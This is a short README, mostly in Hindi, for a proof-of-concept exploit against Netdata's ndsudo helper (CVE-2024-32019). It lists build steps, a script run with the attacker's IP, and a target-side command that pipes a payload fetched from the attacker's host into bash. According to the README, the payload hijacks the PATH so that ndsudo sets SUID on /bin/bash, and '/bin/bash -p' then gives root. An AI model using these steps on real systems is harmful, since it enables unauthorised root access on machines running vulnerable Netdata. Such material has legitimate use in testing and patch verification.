
Netdata ndsudo PoC
Netdata ndsudo PoC
बाइनरी बनाएँ:
go build -ldflags "-s -w" -o nvme poc.go
upx nvme
bash स्क्रिप्ट चलाएँ:
bash exploit.sh <YOUR IP>
लक्ष्य मशीन पर एक लिखने योग्य निर्देशिका में चलाएँ:
curl http://<YOUT IP>:8000/payload.sh | bash
यह स्वचालित रूप से nvme बाइनरी डाउनलोड करेगा, पथ निर्यात करेगा, ndsudo चलाएगा और /bin/bash में SUID जोड़ देगा।
संभवतः आपको exploit.sh में ndsudo पथ बदलने की आवश्यकता होगी।
विशेषाधिकार बढ़ाने के लिए बस चलाएँ:
/bin/bash -p
यह एक्सप्लॉट https://github.com/AzureADTrent/CVE-2024-32019-POC पर आधारित है, जब मैंने इसका परीक्षण किया, तो मुझे यह त्रुटि मिली:
execve: Exec format error
इसीलिए मैंने अपना Go के साथ बनाने का निर्णय लिया।